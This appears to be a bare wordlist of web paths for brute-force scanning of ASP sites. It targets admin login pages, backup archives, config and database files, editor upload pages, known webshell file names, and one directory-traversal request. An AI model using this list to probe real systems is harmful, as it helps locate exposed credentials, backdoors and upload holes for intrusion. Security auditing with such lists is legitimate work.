/Admin_Help_User.asp
/Admin_Label.asp
/Admin_Maillist.asp
/xwzx.asp
/zllm.asp
/zxly.asp
/admin_htmlqx.asp
/Admin_UploadFile_Style.asp
/License.txt
/test_upload.asp
/Admin_Message.asp
/enterprise/upfile.asp
/UserList.asp
/Admin_Photo.asp
/maillist.mdb
/admin_config.asp
/darkst.asp
/admin_config.asp.bak
/admin_data.asp
/admin_data.asp.bak
/admin_default.asp
/admin_edit.asp
/admin_login.asp
/admin_master.asp
/admin_member.asp
/admin_setup.asp
/admin_upfile.asp
/admin_uploadfile.asp
/admin_uploadfile_user.asp
/admin_user.asp
/article.asp
//szwyadmin/login.asp
/articleinfo.asp
/edi/admin/login.asp
/blog.asp
/build.asp
/ewebsoft/admin_login.asp
/ASPXspy2.aspx
/admin_manage_access/login.asp
/admin_manage/login.asp
/Upfiledd.asp
/aspxspy.aspx
/changepass.asp
/Upload_Photo.asp
/cmd.asp
/code.asp
/admin/web_login.asp
/web_login.asp
/code.asp.bak
/commentedit.htm
/Stats.asp
/config.asp
/config.asp.bak
/conn.asp
/guli/login.asp
/conn.asp.bak
/connection.asp
/adsense.txt
/connection.asp.bak
/count.asp
/bdunion.txt
/create.asp
/daemon.asp
/kwadmin/A_Login.asp
/defalut.html
/default.asp.bak
/default.htm
/default_1.asp
/default_1.asp.bak
/default1.asp
/ewebeditor/asp/browse.asp
/default1.asp.bak
/default2.asp
/default2.asp.bak
/diy.asp
/down_addsoft.asp
/down_picupfile.asp
/site.rar
/down_picupload.asp
/edit.asp
/email.asp
/err.asp
/error.asp
/ewebeditor.asp
/funciton.asp.bak
/A_Login.asp
/function.asp
/getpass.asp
/go.asp
/head.asp
/img_upfile.asp
/inc.asp
/inc.asp.bak
/index.asp.bak
/index1.asp
/incFiles/load_gg.asp
/upload_flash_.asp
/qyml/upproduce.asp
/upproduce.asp
/index1.asp.bak
/install.asp
/js.asp
/left.asp
/list.asp
/login.asp
/login.htm
/login.html
/logon.asp
/logout.asp
/logout.htm
/logout.html
/usergroup_0.asp
/forumdata/cache/usergroup_0.asp
/main.asp
/manage.asp
/md5.asp
/member_list.asp
/more.asp
/news.asp
/news_list.asp
/organise.asp
/open.asp
/open.asp.bak
/pass.asp
/passwd.asp
/password.asp
/photo.asp
/popup.asp
/readme.asp
/readme.htm
/readme.html
/readme.txt
/reg.asp
/register.asp
/reload.asp
/rss.asp
/rss1.asp
/rss2.asp
/rssfree.asp
/Saveannounce_upload.asp
/savecomment.asp
/savemessage.asp
/saveup.asp
/search.asp
/setup.asp
/setup.asp.bak
/shell.asp
/show.asp
/shownews.asp
/syscode.asp
/syscode.asp.bak
/sytle.asp
/tb.asp
/test.asp
/test.asp.bak
/upfile_flash.asp
/upfile_soft.asp
/Upfile_SoftPic.asp
/upload.htm
/upload.html
/upload.inc
/UploadFace.asp
/uploadfaceok.asp
/user.asp
/user_files.asp
/user_friends.asp
/user_help.asp
/user_index.asp
/user_login.asp
/user_message.asp
/user_messages.asp
/user_setting.asp
/user_subject.asp
/user_top.asp
/user_update.asp
/user_upfile.asp
/ver.asp
/vote.asp
/warning.asp
/webshell.asp
/administrator.asp
/boss/admin.asp
/m_login.asp
/adminlogin.asp
/Zzm.asp 
/My-login.asp
/1ndex.asp
/Shop_Login.htm
/ManageLogin.asp
/HX_LOGIN.ASP
/editor/admin_login.asp
/eWebEditor/admin_login.asp
/admin/eWebEditor/admin_login.asp
/admin/editor/admin_login.asp
/eWebEditor/db/ewebeditor.mdb
/admin/eWebEditordb/ewebeditor.mdb
/robots.txt
/wwwroot.rar
/wwwroot.zip
/www.rar
/www.zip
/web.zip
/web.rar
/dl.asp
/Admin_DataBackup.asp
/Data_Backup.asp
/admin_backup.asp
/admin_db_backup.asp?action=BackupData
/Manage_backup.asp?action=Backup
/admin_data.asp?action=BackupData
/Manage_backup.asp
/Data_Return.asp
/admin_db_backup.asp?action=RestoreData
/admin_data.asp?action=RestoreData
/gldl.asp
/logo.asp
/admin_style.asp
/ewebeitor.htm
/sqlin.asp
/inc/upload_flash.asp
/upload_flash.asp
/db.asp
/2088shop
/dbb.asp
/NewsUpLoad.asp
/neeao.txt
/inc_config.asp
/b2b_sysdata.asp
/webconfig.asp
/Fy_SqlX.Asp
/lostpass.asp
/conn.txt
/ftp.txt
/Neeao_SqlIn.Asp
/Neeao_sql_admin.asp
/bottom.asp
/foot.asp
/end.asp
/top.asp
/setting.asp
/admin_webmaster.asp
/GetPassword.asp
/findpassword.asp
/User_GetPassword.asp
/change_password.asp
/update.asp
/adduser.asp
/xiaoma.asp
/dama.asp
/gbook.asp
/global.asa
/global.mdb
/说明文档.txt
/说明.txt
/webadmin.asp
/admin_login_lg.asp
/admin_sql.asp
/admin_backupdata.asp
/admin_Restoredata.asp
/admin_EditPass.asp
/admin_server.asp
/安装说明.txt
/安装.txt
/help.txt
/新建 文本文档.txt
/default_right.asp
/Gas_login.asp
/ScanShell.asp
/%23sql.asp
/sql.asp
/admin_db_backup.asp
/admin_set.asp
/admin_setting.asp
/admincheck.asp
/adminfso.asp
/data.asp
/SysUser.asp
/check.asp
/1.txt
/2.txt
/3.txt
/link/
/link.asa
/link.asp
/links.asp
/Sys_admin.asp
/texteditor
/说明.htm
/adminconn.inc
/a_main.asp
/adminda.asp
/login1.asp
/ad.asp
/ad_login.asp
/ad_manage.asp
/addlb.asp
/addmember.asp
/adm_login.asp
/Admin_BatchLink.asp
/admin_del.asp
/admin_delete.asp
/admin_main.asp
/Admin_SoftInfo.asp
/admin1.asp
/admin888.asp
/adminadduser.asp
/admindel.asp
/admindelete.asp
/adminedit.asp
/adminmember.asp
/adminuserlogin.asp
/admintab.asp
/adminuser.asp
/chkadmin.asp
/chklogin.asp
/denglu.asp
/edituser.asp
/editmember.asp
/index_admin.asp
/index_manage.asp
/guanli.asp
/guanli-cn.asp
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
/admin/editor/editor/filemanager/upload/test.html
/editor/editor/filemanager/upload/test.html
/editor/filemanager/upload/test.html
/fckeditor/editor/filemanager/upload/test.html
/connector.asp
/houtai.asp
/houtaiguanli.asp
/htgl.asp
/login_admin.asp
/login_out.asp
/manage_index.asp
/member.asp
/members.asp
/adm_menu.asp
/bm/chkadmin.asp
/Select_feedback.asp
/ewebeditor.mdb
/admin_6list.asp
/system/login/
/users.asp
/sys.asp
/adm.asp
/system.asp
/systems.asp
/aspcheck.asp
/hacker.asp
/123.asp
/3800cc.asp
/hack.asp
/sys_login_easysite.asp
/adlogin.asp
/login_message.asp
/adminindex.asp
/UserLogin.asp
/login_manage.asp
/gg_login.asp
/sysadm_login.asp
/manage_login.asp
/xh_login.asp
/admincs.asp
/land.asp
/elogin.asp
/loginManage.asp
/yns_login.asp
/vo_login.asp
/lygofa.asp
/wen_login.asp
/jswadmin.asp
/manager.htm
/login_form_admin.htm
/admlogin.htm
/admlogin.asp
/LoginPage.do
/ImageGallery.aspx?rif=/&cif=../&ftb=reProduct_content2
/default_Image.asp
/forbook1.asp
/upfile_Dialog.asp
/upimg.asp
/upimg.htm
/upimg.html
/upload.asp?action=upfile
/upload_add.asp
/upload_add.htm
/upload_add.html
/upload_browse.asp
/upload_new_ad.asp
/upload_new_ad.htm
/upload_new_ad.html
/1.asa
/1.asp
/1.rar
/11.asa
/11.asp
/11.rar
/111.asa
/111.asp
/111.rar
/123.asa
/123.rar
/123.txt
/1234.asa
/1234.asp
/1234.rar
/12345.asa
/12345.asp
/12345.rar
/123456.asa
/123456.asp
/123456.rar
/ewebeditor.asp?id=x&style=standard
/安全手册.txt
/安装手册.txt
/更新历史.txt
/商业注册.txt
/升级说明.txt
/使用手册.txt
/使用说明.txt
/特别感谢.txt
/用户手册.txt
/用户说明.txt
/22.asa
/22.asp
/22.rar
/222.asa
/222.asp
/222.rar
/3.asa
/3.asp
/3.rar
/33.asa
/33.asp
/33.rar
/333.asa
/333.asp
/333.rar
/ASPAdmin_A.asp
/DbConnect.asp
/Login_ok.asp
/NewFile.txt
/USERok.asp
/_admin.asp
/a.asa
/a.asp
/aa.asa
/aa.asp
/aaa.asa
/aaa.asp
/ad_admin_login.asp
/add_admin.asp
/add_user.asp
/admcheck.asp
/admcheckform.asp
/admin123.asp
/admin2.asp
/admin_bak.asp
/admin_count.asp
/admin_forums.asp
/admin_home.asp
/admin_info.asp
/admin_pass.asp
/admin_test.asp
/adminadmin.asp
/administration.asp
/admins.asp
/admout.asp
/admsystem.asp
/adoconn.asp
/announcement.htm
/asdf.asp
/aspcmd.asp
/authors.pwd
/auto.asp
/back.asp
/backadm.asp
/backup.asp
/backup.rar
/backup.zip
/base64.asp
/bbs.asp
/bbs1.asp
/c99.asp
/cao.asp
/caonima.asp
/cfg.asp
/cipher.asp
/cmdasp.asp
/command.asp
/common.asp
/conf.asp
/config.inc
/connstr.asp
/console.asp
/const.asp
/consts.asp
/count_admin.asp
/cp.asp
/crypto.asp
/cshell.asp
/css.asp
/d99.asp
/data.rar
/data.zip
/databak.rar
/databak.zip
/database.rar
/database.zip
/db_con.asp
/dbconn.asp
/decrypt.asp
/dede_admin.txt
/default_admin.asp
/default_login.asp
/del.asp
/del_admin.asp
/del_member.asp
/delete.asp
/deletemember.asp
/devel.asp
/System/Function/UploadProductPic.asp
/Function/UploadProductPic.asp
/UploadProductPic.asp
/digshell0.asp
/digshell2.asp
/diy3.asp
/dm.asp
/do.asp
/down.asp
/dtest.asp
/emyuser_login.asp
/encrypt.asp
/exit.asp
/fckeditor/editor/filemanager/browser/default/connectors/test.html
/fckeditor/editor/filemanager/browser/default/frmupload.html
/file.asp
/files.asp
/findaccount.asp
/forum.asp
/frame.asp
/freeweb_admin.asp
/fuck.asa
/fuck.asp
/fuckyou.asp
/geoip.inc
/girl.asp
/girls.asp
/global.asp
/global.inc
/global.txt
/guanli-tw.asp
/hack.asa
/hacker.asa
/hate.asp
/hello.asp
/ht.asp
/htdocs.asp
/idea.asp
/ideas.asp
/inFile.asp
/include.asp
/includeinc.asp
/includes.asp
/incoming.asp
/index_test.asp
/indexadmin.asp
/info.txt
/insert.asp
/inside.asp
/intranet.asp
/key.asp
/kill.asa
/kill.asp
/left.htm
/left.html
/link_admin.asp
/local.asp
/log.asp
/logger.asp
/login_A.html
/login_check.asp
/login_from.asp
/login_in.asp
/loginerror.asp
/loginform.asp
/loginok.asp
/loginsave.asp
/loginsuper.asp
/love.asp
/luck.asp
/m.asp
/ma.asp
/main1.asp
/mainframe.asp
/maintain.asp
/man.asp
/manager_login.asp
/managers.asp
/manual.asp
/master.asp
/member_download.asp
/memberlogin.asp
/members-only
/menu.asp
/menu.htm
/menu.html
/mgr.asp
/mima.txt
/misc.asp
/mm.asp
/mmgr.asp
/mmm.asp
/mrtg.asp
/muma.asp
/my.asp
/myadmin.asp
/myup.asp
/new.asp
/upfile.asp
/upload.asp
/newadmin.asp
/news_admin.asp
/newsadmin.asp
/ok.asp
/ok_pass.asp
/other.asp
/packet.mdb
/pass.txt
/password.txt
/phpcmd.asp
/phpinfo.asp
/phpspy.asp
/post_upfile.asp
/post_upload.asp
/private.asp
/program.asp
/programming.asp
/programs.asp
/public.asp
/qq.txt
/reg_upload.asp
/reg_upload1.asp
/reg_user.asp
/root.asa
/root.asp
/sadmin.asp
/savelogin.asp
/secret.asp
/secrets.asp
/server-info.asp
/server-status.asp
/server_stats.asp
/servu.asp
/set.asp
/settings
/sever.asp
/site.asp
/sitemap.xml
/smanager.asp
/snmp.asp
/source.asp
/sources.asp
/spy.asp
/sqlconf.asp
/stat.asp
/statistics.asp
/store.asp
/ststems.asp
/su.asp
/super.asp
/super1.asp
/supplieradm.asp
/sys_login.asp
/sys_memu.asp
/sysadm_index.asp
/telephone.asp
/temp.asp
/temp_admin.asp
/temporary.asp
/test.txt
/test1.asa
/test1.asp
/test_download.asp
/test_page.asp
/tester.asp
/tester_download.asp
/tool.asp
/tools.asp
/top.htm
/top.html
/up.asp
/update_user.asp
/usage.asp
/user_admin.asp
/userlook.asp
/userslist.asp
/wantpws.asp
/web.config
/weblog.asp
/weblogs.asp
/webmaster.asp
/webstats.asp
/include/upfile_asp.asp
/include/upfile.asp
/wenzhang.asp
/include/upload_asp.asp
/include/upload.asp
/wish.asp
/woaini.asp
/wocaonima.asp
/work.asp
/write.asp
/ws.asp
/wstats.asp
/www.asp
/wwwlog.asp
/x.asp
/xiao.asp
/xiaolu.asp
/xiaoma.asa
/xm.asa
/xm.asp
/xx.asp
/xxx.asp
/yes.asp
/z.asp
/zz.asp
/zzz.asp
/說明.txt
/newsupfile.asp
/Up_BookPicPro.asp
/upLoad_bm1.asp
/upLoad_c1.asp
/uploadPic.asp
/upNewsIMg.asp
/picupsave2.asp
/hege.asp
/mywebshell.asp
/fileupimg2.asp
/upfile_photo.asp
/userreg_setp2.asp
/lovebaobao.asp
/mymm.asp
/newmm.asp
/saveupload.asp
/manage/upfile.asp
/zs_save_add.asp
/UploadImage3_upload.asp
/upfile1.asp
/acblog.asa
/upfilea.asp
/upme2.htm
/upme1.htm
/upme2.asp
/addFile.asp
/addPicture.asp
/popup.htm
/upme1.asp
/uploadfilm.asp
/upfile_Other.asp
/upsave.asp
/uploadphoto.asp
/web_upfile.asp
/upfile2.asp
/photosave.asp
/sub_upload.asp
/s_image.asp
/s_image.htm
/newsimage1.asp
/picupsave.asp
/picupload.asp
/upload2.asp
/uploada.asp
/upload1.asp
/upfile_article.asp
/uploadfiles.asp
/uploadfiles1.asp
/showimg.asp
/Upfile_ProductPic.asp
/Upload_ProductPic.asp
/upfiles.asp
/upfile3.asp
/upload3.asp
/admin_uploadF.asp
/admin_upload.asp
/Upfile_pic.asp
/Upfile_pics.asp
/Upfile_Product.asp
/articleadmin.asp
/loginadmin.asp
/eye2007Admin_login.asp
/infom_login.asp
/KesAdmin_Login.asp
/localhostlogin.asp
/cz_login.asp
/Articlelogin.asp
/xxmslogin.asp
/downlogin.asp
/bbsLogin.Asp
/ewebeditor1013.asp
/shopb2b_sysdata.asp
/asplogin.asp
/tradeLogin.asp
/6k.asp
/zm_marry.asp
/fdnews.asp
/ydxzdate.asa
/play.asp
/mdb.asp
/joekoe_data.asp
/news3000.asp
/configuration/system/Upload_user.asp
/configuration/
/12912.asp
/database.asp
/starark.asp 
/download.asp
/dvbbs.asa
/fdnews.asa
/tiyisw.asp
/datashop.asp
/liaoxd.asp
/Fl_Web.asp
/Hz@host!.asp 
/lennyash.asp
/roha.asp
/Skyj.asp
/wrtxcnqywz4.asp
/wygkcnqyhtml.asp
/PBlog2.asp
/PBlog1.asp
/PBlog3.asp
/oask.asp
/heiren.asp
/115cn.asp
/dvboke.asp
/asp99cms.asp
/login_out/
/edit/
/adminedit/
/admin_edit/
/delete/
/szwyadmin/
/admindelete/
/admin_delete/
/admindel/
/admin_del/
/up/
/Zcfg/
/Z-Blog/
/Ylxd/
/xml/
/wap/
/Skin/
/shop/
/Qybz/
/PJBLOG/
/guestbook/
/health/
/language/
/law/
/sitemap/
/bbss/
/manage888/
/tongji/
/cert/
/tungou/
/dns/
/ybkc/
/ybxygy/
/menu/
/PayOnline/
/!admin!/
/gg/
/indexximg/
/mms/
/show/
/yes/
/net/
/Llyj/
/upload/
/upfile/
/backup/
/cmseditor/
/config/
/webmaster/
/SouthidcEditor/
/root/
/aadmin/
/admintab/
/admin_main/
/main/
/index.htm
/article/
/databases/
/database/
/db/
/dbase/
/devel/
/kwadmin/
/file/
/files/
/forum/
/htdocs/
/idea/
/ideas/
/include/
/includeinc//
/includes/
/incoming/
/install/
/manual/
/misc/
/private/
/filemanager/
/program/
/programming/
/programs/
/public/
/set/
/setting/
/setup/
/source/
/sources/
/statistics/
/Stats/
/usage/
/weblog/
/weblogs/
/webstats/
/work/
/wstats/
/wwwlog/
/wenzhang/
/blog/
/server_stats/
/super/
/login1/
/telephone/
/update/
/count_admin/
/add_admin/
/admin_pass/
/newbbs/
/down/
/bbs/
/eye2007/
/boss/
/Product/
/admin_jy1001/
/WebAdmin/
/bbsxp/
/eneya888/
/localhost/
/admin_999/
/eneya/
/ManageAdmin/
/news/
/l888/
/editor/
/ew/
/ewebeditor/
/myadmin/
/admin868/
/manage_admin/
/admin_cp/
/wish/
/e/
/texteditor/
/mystat/
/manager_admin/
/links/
/managenews/
/xs_admin/
/SysManage/
/manage_news/
/admin99/
/admin_manage/
/admin_manager/
/htmedit/
/gm/
/Ms-admin/
/DvForum/
/admin_info/
/guest/
/land/
/admincn2008/
/222/
/union//vip_manage/
/liuyan/
/4/
/5/
/6/
/AdSystem/
/Ad_Admin/
/Add/
/AdmSystem/
/Admin2/
/Admin3/
/AdminCp/
/Admin_Bak/
/admin/
/admin_index/
/admin_admin/
/index_admin/
/GfEditor/
/index/
/EditBox/
/default/
/manage/
/hywindow/
/ytadmin/
/kefu/
/login/
/zhuye/
/kfuser/
/Link/link_admin/
/Link/admin/
/Link/login/
/manage_index/
/zjpic/
/index_manage/
/wocaonima/
/admin1/
/Apache/
/admin_IF5KBM/
/Web_Editor/
/ADSFGLKN32KFB/
/admin_login/
/login_admin/
/ad_login/
/ad_manage/
/count/
/manager/
/guanli/
/denglu/
/houtai/
/houtaiguanli/
/adminlogin/
/adminuserlogin/
/adm_login/
/chklogin/
/chkadmin/
/user/
/users/
/adduser/
/adminuser/
/admin_user/
/edituser/
/adminadduser/
/member/
/members/
/editmember/
/adminmember/
/addmember/
/logout/
/Admin_Test/
/AdministrAtion/
/Administrators/
/Asp/
/Asp_Admin/
/AspmyAdmin/
/Back/
/BackAdm/
/BackAdmin/
/BackAdmins/
/BackEnd/
/Bbs1/
/Check/
/CheckLogin/
/College/
/Comm/
/Library/
/Conf/
/Console/
/Console/Login/
/Login_From/
/ControlPanel/
/NewAdmin/
/NewWeb/
/News_Admin/
/Office/
/Ok/
/Oldweb/
/Other/
/PhpMyAdmin/
/Product/Manage/
/Reg/
/Register/
/SAdmin/
/SManager/
/Shop/Admin/
/Show/Back/
/Site/
/Sql/
/SqlConf/
/Store/
/Stores/
/SupplierAdm/
/SysAdmin/
/SysAdmins/
/download/
/spzs/
/SysManager/
/mydatazw/
/tot_dabase/
/KS_Data/
/dxy/
/bbs-data/
/blogDB/
/xzdata/
/HXMYDATABASE/
/sjk2008/
/DB_UserData/
/AccessDB/
/Foosun_Data/
/cpgl/
/whj/
/Data.project/
/ggjdsd/
/HxData/
/cnkdata/
/DataCy/
/data_jk/
/Admin_Cy/
/_database/
/dxxobbs/
/blogdata/
/Sys_Login/
/SEM_User/
/System/
/xzsysadmin/
/admin_php/
/job/
/mba/
/bbslogin/
/Systems/
/eye2008/
/cnlogin/
/admin_loginadmin/
/eye2009/
/Teens/
/Test/
/webeditor/
/htmledit/
/doc/
/girls/
/docs/
/mail/
/serial/
/serials/
/zip/
/zips/
/suzhijy/
/p/
/cx/
/ads/
/adminn/
/sex/
/usr/
/z/
/y/
/x/
/www/
/working/
/usrs/
/webhome/
/v/
/valid/
/warez/
/validate/
/validated/
/virgin/
/w/
/upl/
/uploads/
/uploadz/
/us/
/top/
/sexy/
/u/
/temp/
/t/
/thumb/
/thumbs/
/thumbz/
/tmp/
/today/
/tab/
/teen/
/teenz/
/support/
/solution/
/stat/
/supervise/
/supervisor/
/solutions/
/stuff/
/shemales/
/shtml/
/service/
/services/
/serialz/
/mails/
/passwordz/
/run/
/secure/
/security/
/script/
/scripts/
/secrets/
/secret/
/s/
/report/
/reports/
/review/
/reviews/
/pers/
/pic/
/r/
/puppy/
/pwd/
/pwds/
/q/
/protect/
/protected/
/prv/
/pub/
/picpost/
/products/
/prog/
/power/
/preview/
/previews/
/previewz/
/priv/
/picposts/
/pics/
/picture/
/pictures/
/picturez/
/post/
/perso/
/personnal/
/photo/
/photos/
/php_Admin/
/newhome/
/mod/
/mods/
/old/
/pass/
/passwords/
/older/
/password/
/oldies/
/newz/
/o/
/oh/
/module/
/n/
/mon/
/monitor/
/monitors/
/movies/
/gly/
/hardcore/
/manga/
/mirror/
/mirrors/
/mangas/
/messy/
/lost/
/linkz/
/list/
/graph/
/graphic/
/m/
/htdl/
/lesb/
/lesbian/
/lesbians/
/lesbo/
/lez/
/htdoc/
/guanliyuan/
/j/
/l/
/k/
/ids/
/image/
/images_dir/
/imagez/
/html/
/i/
/id/
/help/
/hidden/
/hide/
/home/
/houtaidenglu/
/h/
/graphics/
/graphs/
/girlz/
/girl/
/entry/
/esuper/
/g/
/gal/
/galleries/
/gallery/
/game/
/games/
/gamez/
/food/
/f/
/front/
/fucks/
/ftp/
/filez/
/final/
/free/
/freepic/
/freepics/
/esuperadmin/
/event/
/email/
/en_US/
/emails/
/door/
/downloads/
/downloadz/
/driver/
/drivers/
/double/
/Trade/
/auto/
/backups/
/wp-admin/
/asian/
/cgi-bin/
/cgibin/
/dir/
/dirs/
/dhtml/
/code/
/dl/
/common/
/crack/
/debug/
/cracks/
/crackz/
/content/
/contents/
/codes/
/coding/
/cat/
/cgi/
/catalog/
/catalogs/
/certif/
/certificate/
/certificates/
/certified/
/certify/
/cfg/
/binaries/
/binary/
/bizarre/
/black/
/book/
/books/
/c/
/asians/
/bin/
/app/
/apps/
/appz/
/arc/
/archive/
/archives/
/al/
/amateur/
/amateurs/
/amd/
/amd_007/
/ani/
/ani1/
/anime/
/UpdDate/
/User_Admin/
/User_Login/
/adlogin/
/adm@in/
/Web/
/adminpages/
/abc/
/admanage/
/abcupload/
/about/
/account/
/accounts/
/Web1/
/Web2/
/WebApps/
/Web_Master/
/WeiHu/
/WsManage/
/XtAdmin/
/_Admin/
/Cp/
/Local/
/Log/
/MainTain/
/Manager_Login/
/Managers/
/MemberLogin/
/Mgr/
/Mmgr/
/Mybbs/
/New/
/EAdmin/
/Fuck/
/Gb/
/HYTop.mdb
/Hello/
/Images/
/InFile/
/InTranet/
/Inc/
/Les/
/7/
/8/
/88888/
/9/
/2001/
/2002/
/2003/
/2004/
/2005/
/2006/
/2007/
/2008/
/22/
/2/
/oldbbs/
/11111/
/123/
/tryread/
/FCKeditor/
/11/
/111/
/dvbbs/
/FTB/
/UploadSoft/
/pscms_admin/
/dede/
/lzwadmin/
/addmin/
/Admin_ZgTea_Art/
/amdin/
/Control/
/dede_bbs/
/sys//asjobcom/
/gbook/
/AdminFile/
/lyb/
/book1/
/inside/
/ht/
/htgl/
/gl/
/sys_admin/
/st-admin/
/admin888/
/admin123/
/adminindex/
/ad/
/indexadmin/
/adminadmin/
/www_admin/
/adminpt/
/webmis/
/adminmain/
/Manage_Auto/
/guanli_admin/
/admins/
/adadmin/
/system_admin/
/web_admin/
/Cityadmin/
/systemadmin/
/newsadmin/
/data/
/phpeditor/
/shopadmin/
/ewebedit/
/xxms/
/yns_login/
/smhththt/
/administrator/
/manage123/
/xwzx/
/cnzz/
/admin_yuzhiguo/
/toucher/
/asp-bin/
/fpv_admin/
/cn/
/tacforo/
/sxadmin/
/cjcx/
/bestcollegepicks/
/profile/
/2005kycj/
/stock/
/careerfocus/
/zkcf45/
/zkcf/
/webpet/
/memmng/
/project/
/acct/
/zyadmin/
/Kes/
/../admin
/../admin.asp
/../admin/default
/../admin/default.asp
/../admin/index
/../admin/index.asp
/../admin/login
/../admin/login.asp
/../admin/manage
/../admin/manage.asp
//admin/login.asp
/_Admin
/11111/index.asp
/88888/index.asp
/a
/a_admin.asp
/a_admin.aspx
/a_admin.jsp
/abc
/abcupload
/about
/account
/account.asp
/account.html
/accounts
/acct/login.asp
/acct_login
/ad
/Ad_Admin
/ad_admin/admin_login.asp
/ad_login
/ad_manage
/Add
/add_admin
/adlogin
/adm
/adm@in
/Adm_Login
/admanage
/admin
/admin.aspx
/admin.jsp
/admin/account.asp
/admin/account.html
/admin/adm_menu.asp
/admin/admin.asp
/admin/admin.aspx
/admin/admin.jsp
/admin/admin_6list.asp
/Admin/Admin_Index.asp
/admin/admin_login.asp
/admin/admin_upfile.asp
/admin/adminlogin.asp
/admin/aspcheck.asp
/admin/controlpanel.asp
/admin/controlpanel.html
/admin/cp.asp
/admin/cp.html
/admin/default
/admin/default.asp
/admin/Default.asp?
/admin/default/admin.asp
/admin/default/login.asp
/admin/edit/admin_login.asp
/admin/edit/db/ewebeditor.mdb
/admin/editor/admin_login.asp?
/admin/editor/db/ewebeditor.mdb
/admin/ewebeditor/db/ewebeditor.mdb
/admin/eWebEditor_v280_Free/admin_login.asp
/admin/eWebEditor_v280_Free/db/ewebeditor.mdb
/admin/FCKeditor/ 
/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
/admin/FCKeditor/editor/filemanager/upload/test.html
/admin/go.asp
/admin/home.asp
/admin/htmedit/admin_login.asp
/admin/htmedit/db/ewebeditor.mdb
/admin/index
/admin/index.asp
/admin/index.html
/admin/left.asp
/admin/login
/admin/login.asp
/admin/login.html
/admin/lygofa.asp
/admin/manage
/admin/manage.asp
/admin/manage/admin.asp
/admin/manage/login.asp
/admin/menu.asp
/admin/news.asp
/admin/ows_login.asp
/admin/Select_feedback.asp
/admin/test.asp/info.asp
/admin/upfile.asp
/admin/upload.asp
/admin/uploadfaceok.asp
/admin/user_login.asp
/admin/WebEditor/admin_login.asp
/admin/WebEditor/db/ewebeditor.mdb
/admin/xh_login.asp
/admin/yns_login.asp
/admin_.asp
/admin_admin
/admin_admin.jsp
/admin_area
/Admin_Bak
/admin_body.asa
/admin_body.asp
/admin_Default.asp?
/admin_guanli/
/admin_home/
/admin_index
/admin_index.asa
/admin_index.jsp
/admin_index/admin_index.asp
/admin_index/login.asp
/WebEditor/admin_uploadfile.asp?id=14&dir=../../..
/Admin_jsCreate.asp
/admin_login
/admin_login.asa
/admin/admin_uploadfile.asp
/admin_login.jsp
/admin_login/admin.asp
/admin_login/login.asp
/admin_main
/admin_manage_access/Admin_Default.asp
/admin_move/Admin_Login.asp
/admin_pass
/admin_soft.asp
/admin_soft.aspx
/admin_soft.jsp
/Admin_SoftCateMenu.Asp
/Admin_SoftLink.asp
/Admin_SoftList.asp
/Admin_SubCate.asp
/Admin_Test
/Admin_UpdateSoftNum.asp
/admin_user
/Admin_UserSetting.asp
/admin_yuzhiguo/login.asp
/Admin_ZgTea_Art/Login.asp
/admin1
/admin1.html
/admin1/Admin_Login.asp
/admin123
/Admin2
/admin2.html
/Admin3
/admin4_account
/admin4_colon
/admin888
/adminadmin
/adminceo.asp
/admincn2008/login.asp
/admincontrol.asp
/admincontrol.html
/admincp
/adminDefault.asp?
/adminedit
/AdminFile/Admin_Login.asp
/adminin.asp
/adminindex
/administer
/administr8
/administr8.asp
/administr8.html
/administratie
/administration
/administration.html
/administrator
/administrator.html
/administrator/account.asp
/administrator/account.html
/administrator/admin.asp
/administrator/index.asp
/administrator/index.html
/administrator/login.asp
/administrator/login.html
/administratoraccounts
/administrators
/administrivia
/adminkey.asp
/adminlog.asp
/adminlogin
/admin-login/login.asp
/adminpages
/adminpanel.asp
/adminpanel.html
/adminpro
/adminroot.asp
/admins
/admins.html
/admins_login.asp
/adminsys
/adminsys.asp
/AdminTools
/adminuser
/adminuserlogin
/AdmSystem
/ads
/AdSystem
/adsystem/index.asp
/al
/amateur
/amateurs
/amd
/amd/index.asp
/amd/login.asp
/amd/super.asp
/amd_/admin.asp
/amd_/index.asp
/amd_/login.asp
/amd_/super.asp
/amd_007
/ani
/ani1
/anime
/app
/apps
/appz
/arc
/archive
/archives
/art.asp
/Article
/article/admin
/article/admin/admin.asp
/asian
/asians
/asjobcom/index.asp
/asp
/asp.asp
/asp/admin/login.asp
/Asp_Admin
/AspmyAdmin
/auto
/autologin
/b
/b_admin.asp
/Back
/back/login.asp
/BackAdm
/BackAdmin
/BackAdmins
/BackEnd
/BackUp
/backups
/banneradmin
/basedadmin
/basedadmin/admin_login.asp
/bbadmin
/Bbs
/bbs/admin/login
/bbs/admin_index.asp
/bbs/admin_login.asp
/bbs/Databackup/dvbbs.MDB
/bbs/diy.asp
/bbs/down_addsoft.asp
/bbs/down_picupfile.asp
/bbs/elogin.asp
/bbs/login.asp
/bbs/post_upfile.asp
/bbs/post_upload.asp
/bbs/reg_upload.asp
/bbs/saveup.asp
/bbs/upfile.asp
/bbs/upload_soft.asp
/Bbs1
/bestcollegepicks/login.asp
/bigadmin
/bin
/binaries
/binary
/bizarre
/black
/blog
/blogindex
/book
/book/login.asp
/book1/login.asp
/books
/boss/admin_login.asp
/boss/login.asp
/boss/WebEditor/admin_login.asp
/boss/WebEditor/db/ewebeditor.mdb
/c
/cadmins
/careerfocus/Login.asp
/cat
/catalog
/catalogs
/ccms/
/ccms/index.asp
/ccms/login.asp
/ccp14admin
/CEO.asp
/ceoadmin.asp
/certif
/certificate
/certificates
/certified
/certify
/cfg
/cgi
/cgibin
/cgi-bin
/cgi-bin/login.asp
/cgi-bin/System/Userlogin.asp
/Check
/CheckLogin
/chkadmin
/chklogin
/cjcx/login.asp
/cms/
/cmsadmin
/cmseditor/db/ewebeditor.mdb
/CmsEditor/Upload.asp 
/code
/codes
/coding
/College
/college/index.asp
/Comm
/common
/Conf
/config
/configuration
/configure
/connect/
/Console
/Console/Login
/content
/contents
/controlpanel
/controlpanel.asp
/controlpanel.html
/count/supervise/Login.asp
/count_admin
/Cp
/cp.html
/cpanel
/cpanel_file
/crack
/cracks
/crackz
/Create_Commend.asp
/Create_Default.asp
/Create_jsNews.asp
/Create_jsSearch.asp
/Create_New.asp
/Create_Other.asp
/Create_SoftCate.asp
/Create_SoftList_All.asp
/Create_SoftList_Cate.asp
/customer_login
/d
/data
/DataBackup/
/database
/database/%23Database.mdb
/database/%23Database_bak.mdb
/database_administration
/databases.asp
